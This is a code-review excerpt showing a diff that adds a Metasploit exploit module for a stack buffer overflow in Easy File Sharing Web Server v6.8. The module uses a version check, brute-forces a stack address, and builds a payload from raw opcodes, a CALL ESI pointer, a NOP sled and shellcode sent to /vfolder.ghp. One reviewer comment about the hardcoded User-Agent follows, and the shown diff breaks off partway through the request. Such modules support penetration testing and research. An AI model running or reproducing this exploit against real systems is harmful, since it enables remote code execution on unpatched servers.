modules/exploits/windows/http/easy_file_sharing_web_server.rb

```diff
@@ -0,0 +1,140 @@
+        C:\EFS Software\Easy File Sharing Web Server
+                      },
+                        'License' => MSF_LICENSE,
+                        'Author'  =>	[
+                          'superkojiman - http://www.techorganic.com', # Exploit
+                          'thesubtlety', # Metasploit Module
+                        ],
+                        'References' =>
+                        [
+                          [  'URL', 'https://www.exploit-db.com/exploits/33352/'  ]
+                        ],
+                        'DisclosureDate' => 'May 10 2014',
+                        'Platform' => 'win',
+                        'Payload' =>
+                        {
+                          'BadChars' => "\x00\x20",
+                          'DisableNops' => true
+                        },
+                        'Privileged' => false,
+                        'Targets' =>
+                        [
+                          [
+                            'Windows XP Pro - SP2 and SP3',
+                            {
+                              'Platform' => 'win'
+                            }
+                          ]
+                        ],
+                        'DefaultOptions' => { 'EXITFUNC' => 'thread' },
+                        'DefaultTarget' => 0))
+  end
+
+  def check
+    connect
+    res = send_request_cgi({ 'uri' => '/' })
+    disconnect
+
+    if (res && res.headers.to_s) =~ /Easy File Sharing Web Server v6.8/
+      return Exploit::CheckCode::Vulnerable
+    end
+    if (res && res.body.to_s) =~ /Easy File Sharing Web Server/
+      return Exploit::CheckCode::Detected
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    print_status "Trying #{rhost}:#{rport}..."
+    print_status "If at first you don't succeed, try, try again :)"
+    print_status "We're guessing an address on the stack. It will be a few moments..."
+
+    (1..255).each do |i|
+      n =
+        if i < 16
+          '0' + i.to_s(16)
+        else
+          i.to_s
+        end
+
+      # craft the value of EDX that will be used in CALL DWORD PTR DS:[EDX+28]
+      guess = "0x01" + n + "6940"
+
+      sploit =  rand_text_alpha(64)               # padding
+      sploit += "\x81\xee\x70\xff\xff\xff"        # SUB ESI,-90
+      sploit += "\xff\xe6"                        # JMP ESI
+      sploit += rand_text_alpha(8)                # padding
+      sploit += [guess.to_i(16)].pack("<I")       # overwrite EDX with
+                                                  # pointer to CALL ESI
+      sploit += rand_text_alpha(108)              # padding
+      sploit += [0x10023701].pack("<I")           # pointer to CALL ESI
+      sploit += make_nops(20)                     # NOP sled
+      sploit += payload.encoded
+
+      # send exploit
+      send_request_cgi({
+        'uri' => '/vfolder.ghp',
+        'method' => 'GET',
+        'headers' => {
+          'User-Agent' => 'Mozilla/4.0',
```

Comment:
If there's no special reason to hardcode the user-agent, it's best not to, because this is user-configurable.